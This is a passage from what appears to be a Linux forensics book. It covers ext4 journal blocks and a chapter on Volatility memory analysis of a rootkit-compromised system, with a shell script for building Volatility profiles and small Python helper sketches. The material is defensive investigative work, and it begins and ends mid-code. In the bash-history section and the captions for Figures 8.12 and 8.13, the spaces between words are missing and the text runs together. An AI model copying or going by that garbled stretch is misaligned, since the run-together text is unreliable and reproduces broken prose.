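FIELDS = ("h_magic", "h_blocktype", "h_sequence", "s_blocksize",
          "s_maxlen", "s_first", "s_sequence", "s_start", "s_errno",
          "s_feature_compat", "s_feature_incompat", "s_feature_ro_compat")

def parseJournalSuperblock(data):
    """Decode the leading fields of a journal superblock (big endian)."""
    sb = dict(zip(FIELDS, struct.unpack_from(">12I", data, 0)))
    if sb["h_magic"] != JBD2_MAGIC:
        raise ValueError("magic number mismatch, not a journal superblock")
    sb["s_uuid"] = bytes(data[0x30:0x40]).hex()
    sb["s_nr_users"] = struct.unpack_from(">I", data, 0x40)[0]
    return sb

# synthetic superblock: v2, 4k blocks, 32768 blocks, log starts at block 1
sample = bytearray(1024)
struct.pack_into(">12I", sample, 0, JBD2_MAGIC, 4, 0, 4096, 32768,
                 1, 5, 0, 0, 0, 0, 0)
struct.pack_into(">I", sample, 0x40, 1)
jsb = parseJournalSuperblock(sample)
print("block size %d, %d blocks, next commit ID %d" %
      (jsb["s_blocksize"], jsb["s_maxlen"], jsb["s_sequence"]))

# reading the same bytes as little endian gives a byte-swapped value
wrongMagic = struct.unpack_from("<I", sample, 0)[0]
print("magic read as little endian: 0x%08X" % wrongMagic)
```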

The general format for a transaction in the journal is a descriptor block, followed by one or more data or revocation blocks, and a commit block that completes the transaction. The descriptor block starts with a header (which is the same as the first twelve bytes of the journal superblock) and then has an array of journal block tags that describe the transaction. Data blocks are normally identical to blocks to be written to disk. Revocation blocks contain a list of blocks that were journaled in the past but should no longer be journaled in the future. The most common reason for a revocation is if a metadata block is changed to a regular file data block. The commit block indicates the end of a journal transaction.
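Since every descriptor, revocation, and commit block begins with the same twelve-byte header, a journal can be roughly sorted into transactions without decoding the tags. The sketch below assumes block type values of 1 for descriptor, 2 for commit, and 5 for revocation. Only the value 4 is given in Table 7.25; the others are what I understand the kernel jbd2 header to define, so check them against your kernel source. The function names and sample blocks are hypothetical.

```python
import struct

JBD2_MAGIC = 0xC03B3998

# assumption: values other than 4 come from the kernel jbd2 header
BLOCK_TYPES = {1: "descriptor", 2: "commit", 3: "superblock v1",
               4: "superblock v2", 5: "revocation"}

def classifyJournalBlock(block):
    """Return (type name, transaction ID), or None if there is no header."""
    magic, blockType, sequence = struct.unpack_from(">III", block, 0)
    if magic != JBD2_MAGIC:
        return None            # journaled data blocks carry no header
    return BLOCK_TYPES.get(blockType, "unknown"), sequence

def describeJournal(blocks):
    """Produce a one-line description for each block in a list."""
    lines = []
    for block in blocks:
        info = classifyJournalBlock(block)
        lines.append("data" if info is None else "%s (transaction %d)" % info)
    return lines

def makeHeaderBlock(blockType, sequence, size=4096):
    """Build a synthetic journal block containing only the header."""
    return struct.pack(">III", JBD2_MAGIC, blockType, sequence).ljust(size, b"\x00")

# a made-up transaction 7: descriptor, one data block, commit
journal = [makeHeaderBlock(1, 7), bytes(4096), makeHeaderBlock(2, 7)]
summary = describeJournal(journal)
for line in summary:
    print(line)
```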

I will not provide the internal structures for the journal blocks here for a couple of reasons. First, the journal block structures can differ significantly based on the version of journaling and selected options. The journal is an internal structure that was never really meant to be read by humans. Microsoft has released nothing publicly about their NTFS journaling internals. The only reason we can know about the Linux journaling internals is that it is open source.

Second, there are filesystem utilities in Linux, such as fsck, that can properly read the journal and make any required changes. It is likely a better idea to use the built-in utilities than to try and fix a filesystem by hand. If you do want to delve into the journaling internals, there is no better source than the header and C files themselves. The wiki at kernel.org may also be helpful.

SUMMARY

To say that we learned a little about extended filesystems in this chapter would be quite the understatement. We have covered every feature likely to be found on an ext4 filesystem as of this writing in considerable depth. We also learned a couple of new Python and shell scripting techniques along the way. In the next chapter we will discuss the relatively new field of memory forensics.

CHAPTER 8

Memory Analysis

INFORMATION IN THIS CHAPTER:

Creating a Volatility profile
Getting process information
Process maps and dumps
Getting bash histories
Using Volatility check plugins
Getting network information
Getting filesystem information from memory

VOLATILITY

The Volatility framework is an open source tool written in Python which allows you to analyze memory images. We briefly mentioned Volatility way back in Chapter 3 on live response. The first version of Volatility that supported Linux was released in October 2012. Hopefully Linux support in Volatility will continue to evolve.

We will only cover parts of Volatility that apply to Linux systems. We will not delve too deeply into some of the theory behind how Volatility works either. Our focus is on using the tool. If you are running a Debian-based Linux, Volatility might be available in standard repositories, in which case it can be installed using sudo apt-get install volatility volatility-profiles volatility-tools. If you need to install from source, download the latest version source archive from http://volatilityfoundation.org, uncompress it, then install it by typing sudo ./setup.py install from the main Volatility directory.

CREATING A VOLATILITY PROFILE

Volatility makes use of internal operating system structures. The structures can change from one version of an operating system to the next. Volatility ships with a set of profiles from common versions of Windows. The same is not true for Linux, however. Before rushing to judge, stop to think about how many different kernel versions and variants of Linux exist in the world.

The solution for Linux systems is to create your own profile by compiling a specific program, creating a dwarf file, getting a system map file, and zipping everything together. If this sounds complicated and cumbersome, it is. Never fear, however, as I will show you how to create the profile from your mounted subject image using a shell script. This script should be placed in the same directory as the Volatility module.c and Makefile, which can be found in the tools/linux directory inside of the volatility hierarchy. The script follows.

#!/bin/bash
#
# create-profile.sh
#
# Simple script to create a makefile for a Volatility profile.
# Intended to be used with an image file.
# As developed for PentesterAcademy
# by Dr. Phil Polstra (@ppolstra)

usage() {
  echo "Script to create a Volatility profile from a mounted image file"
  echo "Usage: $0 <path to image root>"
  exit 1
}

if [ $# -lt 1 ] ; then
  usage
fi

oldir=$(pwd)
cd "${1}/boot"
ver=$(ls System.map* | sed "s/System.map-//" | tr "\n" "|" \
  | sed -nr 's/([a-zA-Z0-9\.\-]+\|)*([a-zA-Z0-9\.\-]+\|)$/\2/p' \
  | sed "s/|/\n/")
cd "${oldir}"
echo "Version: ${ver}"
PWD=$(pwd)
MAKE=$(which make)

# the command lines under each target below must start with a tab
cat <<EOF > Makefile.${ver}
obj-m += module.o
-include version.mk
all: dwarf
dwarf: module.c
	${MAKE} -C ${1}/lib/modules/${ver}/build \
	  CONFIG_DEBUG_INFO=y M="${PWD}" modules
	dwarfdump -di module.ko > module.dwarf
	${MAKE} -C ${1}/lib/modules/${ver}/build M="${PWD}" clean
clean:
	${MAKE} -C ${1}/lib/modules/${ver}/build M="${PWD}" clean
	rm -f module.dwarf
EOF

# make the dwarf file
make -f Makefile.${ver}
# copy the System.map file
cp ${1}/boot/System.map-${ver} ./.
# now make the zip
zip Linux${ver}.zip module.dwarf System.map-${ver}

Let’s walk through this script. It begins with the standard she-bang, usage, and command line parameter count check. The current directory is saved on the line oldir=$(pwd), before changing to the subject’s /boot directory. The next part of the script attempts to guess the correct kernel version based on the name of the System.map file. This is complicated by the fact that there may be more than one kernel installed.

For the purposes of this script, we will assume the subject is running the latest kernel version installed. This is another reason you should run uname -a on the subject system before shutting it down. What makes the line determining the kernel version so complicated is the possibility of having more than one System.map file. Let’s break down the ver=… line.

The first command is ls System.map* which causes all of the System.map files to be output one per line. The next command, sed "s/System.map-//", replaces “System.map-” with nothing, which essentially strips off the prefix and leaves us with a list of kernel versions, one per line. The third command, tr "\n" "|", substitutes (translates) newline characters to vertical pipes which puts all versions on the same line. The fourth command contains a long regular expression and a substitution command.

If you examine the regular expression, it consists of two pieces. The first part, “([a-zA-Z0-9\.\-]+\|)*”, matches zero or more items, each made up of letters, periods, numbers, and dashes followed by a vertical pipe. The second part is identical except that the “*” has become a “$”, which anchors it to the end of the line so that it matches the last item (a version with a vertical pipe appended). As a result, the first part effectively matches all but the last item. The substitution command “/\2/” causes the second match (latest version) to be substituted for the entire string. Finally, one last sed command is run to change the vertical pipe back to a newline.
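For readers more comfortable with Python than sed, the same selection can be sketched as follows. This is an illustration of the logic in the ver=… line, not a replacement for it. The function name latestKernelVersion is hypothetical, the filenames are made up, and Python's sorted() stands in for the ordering produced by ls, which may differ slightly depending on locale.

```python
import re

def latestKernelVersion(filenames):
    """Mimic the pipeline: strip the prefix, join with '|', keep the last item."""
    versions = [name.replace("System.map-", "", 1) for name in sorted(filenames)]
    joined = "".join(version + "|" for version in versions)
    # same two-part expression as the sed command; only the last group is kept
    match = re.search(r"(?:[a-zA-Z0-9.\-]+\|)*([a-zA-Z0-9.\-]+\|)$", joined)
    if match is None:
        return None
    return match.group(1).rstrip("|")

# hypothetical contents of a subject's /boot directory
bootFiles = ["System.map-3.16.0-30-generic", "System.map-3.13.0-24-generic"]
print(latestKernelVersion(bootFiles))
```

Note that both ls and sorted() order names as text, so a version such as 3.9 would sort after 3.16. This is one more reason to confirm the running kernel with uname -a rather than trusting the guess.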

Once the version has been determined, the script changes back to the original directory with the line that reads cd "${oldir}". The version is echoed to the screen. Note that the environment variables have been enclosed in curly brackets as this tends to be safer than using bare variables, i.e. $oldir, as these are sometimes misinterpreted. The current working directory and full path to the make command are then saved in the PWD and MAKE environment variables, respectively.

The line cat <<EOF > Makefile.${ver} is slightly different from our previous use of cat <<EOF. Here we have directed the output of cat to a file instead of the terminal or another program. The lines that follow, through “EOF”, are used to create a makefile. For those not familiar with makefiles, they are used to more efficiently build software by only rebuilding what is necessary. The general format for a makefile is a line that reads <target>: [dependencies] followed by a tab-indented list of commands to build the target. The indented lines must use tabs and not spaces in order for the make utility to properly interpret them.

Normally a makefile is used by simply typing make [target]. In order to use this form of make, a file named Makefile must be present in the current directory. The -f option for make allows specification of an alternate makefile. This is precisely what is done in this script. The last lines of the script run make to create a dwarf file, copy the System.map file from the subject system, and then create a zip file that is used by Volatility as a profile. The output from this script is shown in Figure 8.1.

FIGURE 8.1

Using a shell script to create a Volatility profile.

Once the profile is built, copy it to the volatility/plugins/overlays/linux directory. For my laptop, the full path is /usr/local/lib/python2.7/dist-packages/volatility-2.4-py2.7.egg/volatility/plugins/overlays/linux. As shown in Figure 8.2, any valid zip file in this directory becomes a valid Volatility Linux profile. The command vol.py --info runs Volatility and lists all available profiles and other information. If you pipe the results to grep, like so vol.py --info | grep Linux, it will give you a list of Linux profiles (plus a couple other things) as shown in the figure.

FIGURE 8.2

Volatility Linux profiles. The highlighted lines show profiles automatically loaded based on the zip files in this directory.

GETTING PROCESS INFORMATION

The syntax for running a command in Volatility is vol.py --profile=<profile> -f <image file> <command>, e.g. vol.py --profile=LinuxUbuntu-14_04-3_16_0-30x64 -f ~/cases/pfe1/ram.lime linux_pslist. If you plan on using scripts to look at process information (or anything for that matter) using Volatility, you can store this obnoxiously long command, with profile and path to your RAM image, in a variable.
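In a Python script, the long command can be kept in one place by building the argument list in a small function. The sketch below only constructs and prints the command. The volCommand name is hypothetical, and the profile and image path are the ones from the example above; substitute your own.

```python
import os.path
import shlex

def volCommand(profile, image, plugin, *pluginArgs):
    """Build the argument list for running one Volatility command."""
    return (["vol.py", "--profile=" + profile, "-f", image, plugin] +
            list(pluginArgs))

PROFILE = "LinuxUbuntu-14_04-3_16_0-30x64"
IMAGE = os.path.expanduser("~/cases/pfe1/ram.lime")

cmd = volCommand(PROFILE, IMAGE, "linux_pslist")
# show the command as it would be typed in a shell
print(" ".join(shlex.quote(arg) for arg in cmd))
```

The resulting list can be handed to subprocess.call(cmd) or a similar function when you are ready to run it, which avoids any shell quoting problems with unusual paths.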

If you plan on running more than one Volatility command on the command line, you might consider using the alias utility to spare yourself the pain of repeatedly typing all of this (and likely fat-fingering it at least a few times). The general syntax for the alias command is alias shortcut="really long command that you don't want to type". If you put this command in your .bashrc file (located in your home directory) or other startup file, it will be available to you each time you log in. If you want to use the alias without logging out after editing .bashrc, you must source the .bashrc file by typing . ~/.bashrc. The appropriate line that has been added toward the end of the .bashrc file (which is highlighted) and the sourcing of .bashrc are shown in Figure 8.3.

FIGURE 8.3

Creating an alias to more easily run Volatility. The highlighted line near the end of the .bashrc file creates the appropriate alias.

All of the supported Linux commands begin with “linux_”. Typing vol.py --info | grep linux_ should produce a complete list of available Linux commands. Partial output from running this command is shown in Figure 8.4. As of Volatility 2.4 there are 66 of these commands. It is important to keep in mind that memory analysis is a somewhat new field. As a result, it is not uncommon for some of these Volatility commands to fail.

FIGURE 8.4

Some of the available Volatility Linux commands.

Volatility provides a number of process commands for Linux systems. One of the simplest is linux_pslist which produces a list of tasks by walking the task list. This command outputs the process name, process ID, user ID, and group ID (along with a couple other fields that you likely don’t need). Partial output from running this command against our PFE subject system is shown in Figure 8.5. The highlighted row shows a shell associated with the Xing Yi Quan rootkit running with root privileges in process 3027.

FIGURE 8.5

Partial output of the Volatility linux_pslist command. The highlighted row shows a rootkit shell running with administrative privileges.

Another command for listing processes is linux_psaux. This command is named after ps -aux, which is a favorite command for people who want to get a listing of all processes complete with command lines. Partial output from this command is shown in Figure 8.6. The highlighted lines show how a root shell was created with sudo -s (process 3034), which caused bash to run as root (process 3035), and then the LiME module was installed (process 3073) in order to dump the RAM.

FIGURE 8.6

Partial output from running the Volatility linux_psaux command against the PFE subject system.

The two process commands presented thus far only show the processes in isolation. To get information on the relationship of processes to each other, the linux_pstree command can be used. This command will show processes with any subprocesses listed underneath and preceded by a period. Nested processes will have multiple periods prepended to their names. Not surprisingly, almost everything is a subprocess of init, which has a process ID of 1 as it is the first thing executed at boot time. Partial output from running this command against the PFE subject system is shown in Figure 8.7. The highlighted portion clearly shows the creation of the root shell by the user with ID 1000 which was then used to dump the RAM with LiME.

FIGURE 8.7

Partial results from running the Volatility linux_pstree command against the PFE subject system. The highlighted output shows the relationships of processes highlighted in Figure 8.6.

While the linux_psaux command is nice and provides a lot of information, there is another command that can provide even more information. That command is linux_psenv. This command lists the full process environment for every displayed process. Because this command will generate a lot of output, you may wish to use the -p option, which allows you to provide a comma-delimited list of process IDs. For help on this, or any other Volatility command, run vol.py <command> -h for a brief help screen. The last part of this help screen for linux_psenv as well as the results of running linux_psenv on the process associated with the rootkit are shown in Figure 8.8.

FIGURE 8.8

Partial results of running vol.py linux_psenv -h and results of running this command on the process associated with a rootkit.

The -p option from the help screen is highlighted in Figure 8.8. Looking at the bottom of the figure we see that this process was executed by the john user with user ID 1000, and that sudo was used. This does not necessarily mean that John was involved in the compromise. Rather, this tells us that his account was used. There are a number of reasons that his account may have been used. He might have been targeted by someone that knew he had administrative privileges. It is also quite possible that he has a weak password that the attacker was able to crack.

Volatility provides a cross-reference command for processes called linux_psxview. Why would you want such a command? Some malware will attempt to hide its processes from view by altering internal kernel structures. By comparing (cross-referencing) the various structures, inconsistencies related to malware are more easily identified. Partial results of running this command against the PFE subject system are shown in Figure 8.9. In this case nothing unusual was noted.

FIGURE 8.9

Partial results from running linux_psxview against the PFE subject system.
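The idea behind cross-referencing is simple enough to sketch in a few lines of Python. The example below is not how Volatility implements linux_psxview. The source names and process IDs are hypothetical stand-ins for whatever structures are being compared, and the point is only that a process missing from one view but present in the others deserves a closer look.

```python
def crossReference(views):
    """Compare process ID sets gathered from different sources.

    views maps a source name to the set of PIDs that source reports.
    Returns {pid: [sources that do not list it]} for every PID that is
    missing from at least one source.
    """
    allPids = set().union(*views.values())
    suspicious = {}
    for pid in sorted(allPids):
        missing = sorted(name for name, pids in views.items() if pid not in pids)
        if missing:
            suspicious[pid] = missing
    return suspicious

# made-up data: process 4242 has been unlinked from the task list only
views = {
    "task list": {1, 3027, 3035},
    "pid hash": {1, 3027, 3035, 4242},
    "memory cache": {1, 3027, 3035, 4242},
}
hidden = crossReference(views)
for pid, missing in hidden.items():
    print("PID %d is missing from: %s" % (pid, ", ".join(missing)))
```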

PROCESS MAPS AND DUMPS

In the previous section we saw how Volatility can be used to get lists of processes including detailed information on each process. In this section we will examine how to use Volatility to determine how processes are laid out (mapped) in memory. The first command we will discuss is linux_proc_maps. The results of running this command against the rootkit process on the PFE subject system are shown in Figure 8.10.

FIGURE 8.10

Getting a process map for the rootkit process.

The linux_proc_maps command displays memory segments used by a process. Notice that each segment has flags (permissions) associated with it. What you will not see on Linux (in theory at least) is a segment that is both writable and executable as this would open the door for an attacker to rewrite code in a process and then run malicious code. Notice that if a file is associated with a chunk of memory, its inode and file path are also displayed. In other words, the filesystem analysis performed in previous chapters is still applicable when analyzing memory.
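Checking for segments that are both writable and executable is easy to automate once the map has been parsed. The sketch below assumes each segment has already been reduced to a (start, end, flags, path) tuple with flags written like "r-x". That tuple layout, the function name, and the sample addresses and paths are all hypothetical and are not Volatility's output format.

```python
def writableAndExecutable(segments):
    """Return the segments whose flags include both write and execute."""
    return [seg for seg in segments if "w" in seg[2] and "x" in seg[2]]

# made-up process map: code, data, heap, and one segment that should not exist
segments = [
    (0x00400000, 0x00401000, "r-x", "/tmp/sample"),
    (0x00600000, 0x00601000, "r--", "/tmp/sample"),
    (0x00601000, 0x00602000, "rw-", "/tmp/sample"),
    (0x01a2b000, 0x01a4c000, "rw-", "[heap]"),
    (0x7f0000000000, 0x7f0000001000, "rwx", ""),
]
flagged = writableAndExecutable(segments)
for start, end, flags, path in flagged:
    print("0x%x-0x%x %s %s" % (start, end, flags, path or "(anonymous)"))
```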

The rootkit appears to be loaded at the standard place of 0x400000. It has a couple of additional segments, one of which is read only. There is also a heap associated with this program. A couple of shared libraries, which also have some extra memory segments (for storing their variables), are loaded higher up in memory. The program stack (which grows downward) is also in the higher memory locations. There is an alternative command to get this information, linux_proc_maps_rb. This command uses the balanced tree structures used to map memory as the source of its data. These trees are also known as red-black trees, which is the reason for the _rb suffix.

The fact that the C library is loaded suggests that this rootkit was written in C or C++. This can’t be proven without analyzing the code, however, as it is possible to load this library even if the rootkit was written in another language such as Assembly. How can the rootkit be examined? The Volatility linux_procdump command can be used to dump a process’s memory to a file. We will discuss what to do with such a file later in this book when we discuss malware analysis.

The linux_procdump command accepts an optional process ID list and requires an output directory which is specified with the -D (or --directory=) option. Figure 8.11 shows the results from running linux_procdump on our rootkit process and printing out the first part of the resulting dump. We can see from the first four bytes in the dump that this is an Executable and Linkable Format (ELF) file that has been loaded into memory.

FIGURE 8.11

Results of running the Volatility linux_procdump command on the rootkit from the PFE subject system. The first four bytes of the dump indicate this is an executable in ELF format.
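The same check can be scripted when many dumps need to be triaged. The following sketch tests for the four-byte ELF signature (0x7F followed by the letters ELF) and reads the next two identification bytes, which record the word size and byte order. The function names are hypothetical and the sample header is synthetic rather than taken from the rootkit dump.

```python
ELF_MAGIC = b"\x7fELF"

def looksLikeElf(data):
    """True if the data begins with the four-byte ELF signature."""
    return data[:4] == ELF_MAGIC

def describeElf(data):
    """Summarize word size and byte order from the ELF identification bytes."""
    if not looksLikeElf(data) or len(data) < 6:
        return None
    wordSize = {1: "32-bit", 2: "64-bit"}.get(data[4], "unknown class")
    byteOrder = {1: "little endian", 2: "big endian"}.get(data[5], "unknown order")
    return "%s %s ELF" % (wordSize, byteOrder)

# synthetic start of a dump: 64-bit, little endian
sampleDump = ELF_MAGIC + b"\x02\x01\x01" + b"\x00" * 9
print(describeElf(sampleDump))
```

To use this on a real dump, read the first sixteen bytes of the file opened in binary mode and pass them to describeElf.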

GETTINGBASHHISTORIESEarlierinthisbookwediscussedhowtogetusers’bashhistoriesfromtheirhistoryfiles.We can also get the bash history information from the bash processmemory itself.Asdiscussedpreviously,asophisticatedattackermightdeletethehistoryfilesand/orsetthehistory size to zero. The history size is determined by the HISTSIZE environmentvariable, which is normally set in the .bashrc file (default value is 1000). Even if thehistoryisnotbeingsavedtodisk,itisstillpresentinmemory.

The Volatility command for retrieving bash histories from bash process memory islinux_bash.PartialresultsfromrunningthiscommandagainstthePFEsubjectsystem,with suspicious activity highlighted, are shown in Figure 8.12 and Figure 8.13. Manyotheractionsbytheattackerwerefoundthatarenotdisplayedinthefigures.

FIGURE8.12

Partialresultsfromrunninglinux_bashagainstthePFEsubjectsystem.Thehighlightedportionshowswhereanattackerattemptedtomodifythe/etc/passwordfileaftermovingthebogusjohnnuser’shomedirectory.

FIGURE8.13

Partialresultsfromrunninglinux_bashagainstthePFEsubjectsystem.Thehighlightedportionshowswhereanattackermovedahomedirectoryforanewlycreateduserandsetpasswordsforsystemaccounts.

Just as we have a command for retrieving the environment for any process, linux_psenv, there is a Volatility command that returns the environment for any running bash shell. This command is called linux_bash_env. Partial results from running this command are shown in Figure 8.14. From the USER variable in each of the bash shells shown in the figure, we can see that one shell is run by the john user and the other is run by root. It is likely that the john user started the second shell with sudo -s.

FIGURE 8.14

Partial output from running the Volatility linux_bash_env command against the PFE subject system.

When a command is run for the first time in a bash shell, bash must search through the user's path (stored in the PATH environment variable). Because this is a time-consuming process, bash stores frequently run commands in a hash table to alleviate the need to find programs each time. This hash table can be viewed, modified, and even cleared using the hash command. Volatility provides the command linux_bash_hash for viewing this bash hash table for each bash shell in memory. The results of running this command against the PFE subject system are shown in Figure 8.15.

FIGURE 8.15

Results from running the Volatility linux_bash_hash command against the PFE subject system.
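To make the idea of a command hash table concrete, here is a small sketch of a PATH search with a cache in front of it. This is an illustration of the general technique only and does not reproduce bash's internal data structures; the CommandHash class and its hit counter are hypothetical names chosen for the example.

```python
import os


class CommandHash:
    """Cache the full path of each command after the first PATH search."""

    def __init__(self, path=None):
        raw = path if path is not None else os.environ.get("PATH", "")
        self.dirs = [d for d in raw.split(os.pathsep) if d]
        self.table = {}  # command name -> [hit count, full path]

    def lookup(self, name):
        # Fast path: the command was found earlier, so skip the search.
        if name in self.table:
            self.table[name][0] += 1
            return self.table[name][1]
        # Slow path: walk every PATH directory in order.
        for directory in self.dirs:
            candidate = os.path.join(directory, name)
            if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
                self.table[name] = [1, candidate]
                return candidate
        return None


if __name__ == "__main__":
    cache = CommandHash()
    cache.lookup("ls")
    cache.lookup("ls")
    for name, (hits, full_path) in cache.table.items():
        print(hits, full_path)
```

From an investigator's point of view, the interesting property is that such a table records which programs were run from a shell and where they were found, even if the history has been cleared.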

VOLATILITY CHECK COMMANDS

Volatility contains several commands that perform checks for various forms of malware. Many of these commands are of the form linux_check_xxxx. In general, Volatility commands can take a long time to run, and these check commands seem to take the longest time. How long is a long time? Figure 8.16 shows a screenshot from an attempt to run the linux_apihooks command, which is used to detect userland API hooks, against the PFE subject system. After three hours of processing the small (2 GB) RAM image on my i7 laptop with 8 GB of memory, the command still hadn't completed.

FIGURE 8.16

A very long running Volatility command. The command was aborted after it had not completed in nearly three hours.

If you suspect that the function pointers for network protocols on a system have been modified, the linux_check_afinfo command will check these function pointers for tampering. This command returned no results when run against the PFE subject system. The linux_check_creds command is used to detect processes that are sharing credentials. Those familiar with Windows may have heard of pass-the-hash or pass-the-token attacks, in which an attacker borrows credentials from one process to run another process with elevated privileges. This command checks for the Linux equivalent of this attack. Running this command against the PFE subject system also produced no results.

The linux_check_fop command can be used to check file operation structures that may have been altered by a rootkit. Once again, running this command against the PFE subject system produced no results. This is not surprising. The rootkit installed on this system hides itself with a method that doesn't involve altering the file operation structures (rather, the directory information is modified).

Many readers are likely familiar with interrupts. These are functions that are called based on hardware and software events. The function that is called when a particular interrupt fires is determined by entries in the Interrupt Descriptor Table (IDT). The Volatility command linux_check_idt allows the IDT to be displayed. The results of running this command against the PFE subject system are shown in Figure 8.17. Notice how all of the addresses are close to each other. A significantly different address in any of these slots would be suspicious.

FIGURE 8.17

Results from running the Volatility linux_check_idt command against the PFE subject system.

The kernel mode counterpart to the linux_apihooks command is linux_check_inline_kernel. This command checks for inline kernel hooks. In other words, this verifies that kernel function calls aren't being redirected to somewhere else. Running this command against the PFE subject system produced no results.

Volatility provides the linux_check_modules command, which will compare the module list (stored in /proc/modules) against the modules found in /sys/module. Rootkits might be able to hide by altering the lsmod command or other internal structures, but they always must exist somewhere in a kernel structure. This command also produced no results when run against the PFE subject system.

While Windows uses an API, Linux computers utilize system calls for most operating system functions. Like interrupts, system calls are stored in a table and are referenced by number. The mapping of numbers to functions is stored in system headers. The linux_check_syscall command will check the system call table for alterations. If something has been changed, "HOOKED" is displayed after the index and the address. Otherwise, the normal function name is displayed. On 64-bit systems there are two system call tables. One table is for 64-bit calls and the other for 32-bit calls. Running this command against the PFE subject system revealed that the 64-bit open, lstat, dup, kill, getdents, chdir, rename, rmdir, and unlinkat system calls had all been hooked by the Xing Yi Quan rootkit.
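Because the system call tables are long, it can help to save the command output to a file and pull out only the flagged entries. The sketch below assumes that each output line is whitespace separated and holds the table name, the index, and the address, followed by either a function name or the word HOOKED. That column layout and the sample addresses are assumptions made for illustration, so check them against your own Volatility output.

```python
def hooked_entries(lines):
    """Return the split fields of every line that is flagged as HOOKED."""
    return [line.split() for line in lines if "HOOKED" in line]


# Illustrative sample only; the addresses are made up.
SAMPLE = [
    "64bit 0 0xffffffff811dd5a0 sys_read",
    "64bit 1 0xffffffff811dd630 sys_write",
    "64bit 2 0xffffffffa0613340 HOOKED",
    "64bit 6 0xffffffffa06135f0 HOOKED",
]

if __name__ == "__main__":
    for fields in hooked_entries(SAMPLE):
        table, index, address = fields[0], fields[1], fields[2]
        print(table, index, address)
```

On x86-64 Linux, index 2 is open and index 6 is lstat, which matches two of the calls named above.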

Volatility provides two commands for detecting keylogging: linux_check_tty and linux_keyboard_notifiers. Each of these checks for well-documented keylogging techniques. The first checks for interception at the terminal device level, and the second verifies that all processes on the keyboard notifier list are in the kernel address space (user address space indicates malware). If a problem is detected, the word "HOOKED" is displayed. The results of running these two commands are shown in Figure 8.18. No keylogger was detected on the PFE subject system.

FIGURE 8.18

Running Volatility keylogging detection commands against the PFE subject system.

GETTING NETWORKING INFORMATION

Many types of malware will attempt to exfiltrate data and/or use some form of interprocess communication (IPC). These activities usually involve some sort of networking. Volatility allows you to get various types of networking information, in order to help you locate malware.

The Linux ifconfig command is used to list network interfaces along with their MAC and IP addresses, etc. The Volatility linux_ifconfig command will provide a list of network interfaces with IP address, MAC address, and whether or not promiscuous mode is enabled. As a reminder, packets received on an interface that are for a different interface are normally dropped. An interface in promiscuous mode may be used for packet sniffing as no packets are dropped. The results of running this command against the PFE subject system are shown in Figure 8.19. Nothing unusual is seen here.

FIGURE 8.19

Results of running the Volatility linux_ifconfig command against the PFE subject system.

Once the network interfaces are known, you should look at open ports on the subject machine. On Linux systems the netstat command is one of many tools that will report this type of information. The Volatility linux_netstat command provides similar information. Readers are likely familiar with TCP and UDP sockets. Some may not be familiar with UNIX sockets, which are also reported by netstat. A UNIX socket is used for interprocess communication on the same machine. If you look at a typical Linux system it will have a lot of these sockets in use. Don't overlook these sockets in your investigation, as they could be used for IPC between malware components or as a way to interact with legitimate system processes.

Because the linux_netstat command returns so much information, you might want to combine it with grep to separate the various socket types. Results from running the linux_netstat command with the results piped to grep TCP are shown in Figure 8.20. The highlighted line shows a rootkit shell is listening on port 7777. We can also see Secure Shell (SSH) and File Transfer Protocol (FTP) servers running on this machine. There are dangers associated with running an FTP server. One of these is the fact that logins are unencrypted, which allows for credentials to be easily intercepted. Online password cracking against the FTP server is also much quicker than running a password cracker against SSH. This FTP server could have easily been the source of this breach.

FIGURE 8.20

TCP sockets on the PFE subject system.

The results from running linux_netstat against the PFE subject system and piping them to grep UDP are shown in Figure 8.21. Partial results of running this command and piping output to grep UNIX are shown in Figure 8.22. Not surprisingly, a large number of UNIX sockets are being used by operating system and X-Windows components. Nothing out of the ordinary is seen here.

FIGURE 8.21

UDP sockets on the PFE subject system.

FIGURE 8.22

Partial listing of UNIX sockets on the PFE subject system.

Linux provides an extensive system, known as netfilter, for filtering out various networking packets. Netfilter allows a set of hooks to be created at various points in the network flow, such as pre-routing, post-routing, etc. A complete discussion of netfilter is well beyond the scope of this book. The Volatility linux_netfilter command will list netfilter hooks that are present. Running this command against the PFE subject system revealed a pre-routing hook with an address similar to that of the system call hooks created by the Xing Yi Quan rootkit.

The Address Resolution Protocol (ARP) is used to translate IP addresses to MAC (hardware) addresses. Some attacks work by altering the ARP table and/or by abusing the ARP protocol. Volatility provides the linux_arp command for printing ARP tables. The results of running this command against the PFE subject system are shown in Figure 8.23. There appears to be nothing amiss here.

FIGURE 8.23

The ARP Table from the PFE subject system.

Sockets operating in promiscuous mode can be listed with the Volatility linux_list_raw command. Running this command against the PFE subject system only showed the two Dynamic Host Configuration Protocol (DHCP) clients. There are two because each network interface using DHCP has its own process. In other words, this revealed nothing abnormal.

GETTING FILESYSTEM INFORMATION

The previous, quite lengthy, chapter dealt with filesystems. You might wonder why you would use a memory analysis tool to inspect filesystems. There are a couple of reasons for doing this. First of all, knowing what filesystems have been mounted can be helpful. Secondly, many modern Linux systems make use of temporary filesystems that go away when the system is shut down. A tool like Volatility may be the only way to recover these temporary filesystems.

The Volatility linux_mount command lists all mounted filesystems complete with mount options. The results from this command allow you to detect extra things that have been mounted, and also filesystems that have been remounted by an attacker with new options. Partial results from running this command against the PFE subject system are shown in Figure 8.24. The FAT (/dev/sdb1) and ext4 (/dev/sdb2) partitions from my response drive used to load LiME can be seen in the figure.

FIGURE 8.24

Partial results from running the Volatility linux_mount command against the PFE subject system.

Not surprisingly, Linux caches recently accessed files. The Volatility linux_enumerate_files command allows you to get a list of the files in the cache. This can help you more easily locate interesting files when performing your filesystem analysis. As can be seen from Figure 8.25, the john user has a lot of files associated with the rootkit in his Downloads folder. This command produces a lot of output. To home in on particular directories, you might want to pipe the results to egrep '^<path of interest>', e.g. egrep '^/tmp/'. The "^" in the regular expression anchors the search pattern to the start of the line, which should eliminate the problem of other directories and files that contain the search string appearing in your results. egrep (extended grep) is used here, although plain grep also supports the "^" anchor. Partial results from piping the command output to egrep '^/tmp/' are shown in Figure 8.26. Notice there are several files associated with the rootkit here, including #657112, #657110, and #657075, which are inode numbers associated with the rootkit files.

FIGURE 8.25

Rootkit files in the filesystem cache.

FIGURE 8.26

Partial results of running the Volatility linux_enumerate_files command against the PFE subject system and piping the output to egrep '^/tmp/'.
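The effect of the "^" anchor is easiest to see by comparing it with an unanchored search. The sketch below assumes, as the egrep example does, that each output line begins with the file path; the sample paths other than /tmp/xingyi_bindshell_port are invented for the illustration, and the function name is hypothetical.

```python
import re


def lines_under(lines, directory):
    """Keep only lines that START with the given directory (like egrep '^dir/')."""
    prefix = directory.rstrip("/") + "/"
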